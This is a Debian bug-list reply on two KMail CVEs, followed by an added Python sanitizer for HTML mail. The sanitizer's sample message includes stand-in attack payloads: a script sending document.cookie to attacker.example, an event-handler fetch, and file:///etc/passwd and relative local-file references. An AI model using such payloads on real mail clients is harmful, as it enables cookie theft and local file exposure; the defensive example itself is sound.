
Re: Bug#853241: kf5-messagelib: CVE-2016-7967 CVE-2016-7968



On Monday, 30 January 2017, 19:55:16 CET, Thorsten Alteholz wrote:
> Package: kf5-messagelib
> Severity: important
> Tags: security
[…]
> the following vulnerabilities were published for kf5-messagelib.
> 
> CVE-2016-7967[0]:
> | KMail since version 5.3.0 used a QWebEngine based viewer that had
> | JavaScript enabled. Since the generated html is executed in the local
> | file security context by default access to remote and local URLs was
> | enabled.
> 
> CVE-2016-7968[1]:
> | KMail since version 5.3.0 used a QWebEngine based viewer that had
> | JavaScript enabled. HTML Mail contents were not sanitized for
> | JavaScript and included code was executed.

Unstable has KMail 5.2.3 from KDEPIM 16.04 which AFAIK doesn't use webengine 
yet. I am not sure whether the older KMail + messagelib stuff has similar 
issues.

Ciao,
-- 
Martin
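The two CVE descriptions quoted above come down to one thing: HTML mail was handed to a JavaScript-capable viewer unsanitized, and that viewer ran in the local-file security context, so both script and local/remote URL references in a message worked. As an added illustration of what "sanitized for JavaScript" means in practice (example code written for this page, not KMail or messagelib code; the element, attribute and scheme lists are my own choice rather than any KDE policy, and the sample mail body is constructed), here is a small Python sanitizer that strips active content and rejects any URL that is not on an explicit scheme allowlist, so relative and file: references cannot resolve into the local file context:

```python
"""Sanitize an HTML mail body before a JavaScript-capable viewer renders it.

Added example, not KMail/messagelib code. Covers the two failure modes named
in the bug: script execution from message content (CVE-2016-7968) and URL
references that resolve in the local-file security context (CVE-2016-7967).
The lists below are this example's own choices, not a KDE policy.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements removed together with everything inside them.
DROP_SUBTREE = {"script", "style", "iframe", "frame", "frameset", "object",
                "embed", "applet", "form", "noscript", "template"}
# Elements removed as tags while their children are kept.
DROP_TAG_ONLY = {"base", "meta", "link"}
VOID_ELEMENTS = {"br", "hr", "img", "input", "area", "col", "source", "wbr"}
# Attributes whose value is a URL and must pass safe_url().
URL_ATTRS = {"href", "src", "action", "background", "poster", "formaction", "data"}
# Allowlist: anything else, including an empty (relative) scheme, is rejected.
SAFE_SCHEMES = {"http", "https", "mailto", "cid"}


def safe_url(value):
    """Accept only URLs whose parsed, lowercased scheme is allowlisted.

    Relative URLs fail because in the vulnerable viewer they resolved against
    the local file context. "JaVaScRiPt:" fails because the scheme is
    lowercased before comparison; "java\\tscript:" and similar padding either
    parse to no scheme at all or to "javascript", and both are rejected.
    """
    return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES


class MailHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []         # sanitized markup fragments
        self.skip_stack = []  # names of open DROP_SUBTREE elements
        self.removed = []     # audit trail: ("element", tag) / ("attribute", "tag@name")

    def handle_starttag(self, tag, attrs):
        if self.skip_stack:
            if tag in DROP_SUBTREE:
                self.skip_stack.append(tag)  # track nesting of dropped elements
            return
        if tag in DROP_SUBTREE:
            self.removed.append(("element", tag))
            self.skip_stack.append(tag)
            return
        if tag in DROP_TAG_ONLY:
            self.removed.append(("element", tag))
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):  # every inline event handler is script
                self.removed.append(("attribute", f"{tag}@{name}"))
                continue
            if name in URL_ATTRS and (value is None or not safe_url(value)):
                self.removed.append(("attribute", f"{tag}@{name}"))
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_stack:
            if tag in self.skip_stack:  # pop back to the matching dropped element
                while self.skip_stack.pop() != tag:
                    pass
            return
        if tag in DROP_TAG_ONLY or tag in VOID_ELEMENTS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_stack:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including conditional comments) are dropped

    def handle_decl(self, decl):
        pass  # the viewer supplies its own doctype


def sanitize_mail_html(html):
    """Return (sanitized_html, list_of_removed_items)."""
    parser = MailHtmlSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample body (not a real message) with the patterns at issue:
# inline script, an event handler, a file: image, an obfuscated javascript:
# link and a relative iframe reference into the user's home directory.
SAMPLE_MAIL = (
    '<html><body>'
    '<p onmouseover="fetch(\'http://attacker.example/x\')">Hello</p>'
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
    '<img src="file:///etc/passwd">'
    '<a href="JaVaScRiPt:alert(1)">click</a>'
    '<a href="https://example.org/">ok</a>'
    '<iframe src="../../../home/user/.kde/share/config/"></iframe>'
    '<img src="cid:part1@example.org" alt="inline">'
    '</body></html>'
)

if __name__ == "__main__":
    clean, removed = sanitize_mail_html(SAMPLE_MAIL)
    print(clean)
    for kind, what in removed:
        print(f"removed {kind}: {what}")
```

The allowlist on schemes is the important design choice: a denylist of "javascript:" and "file:" would still let a relative reference reach the local file context, which is exactly the CVE-2016-7967 case, so anything without an explicitly permitted scheme is dropped. The `removed` list is there so a viewer can log or display what was stripped rather than silently rewriting the message.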

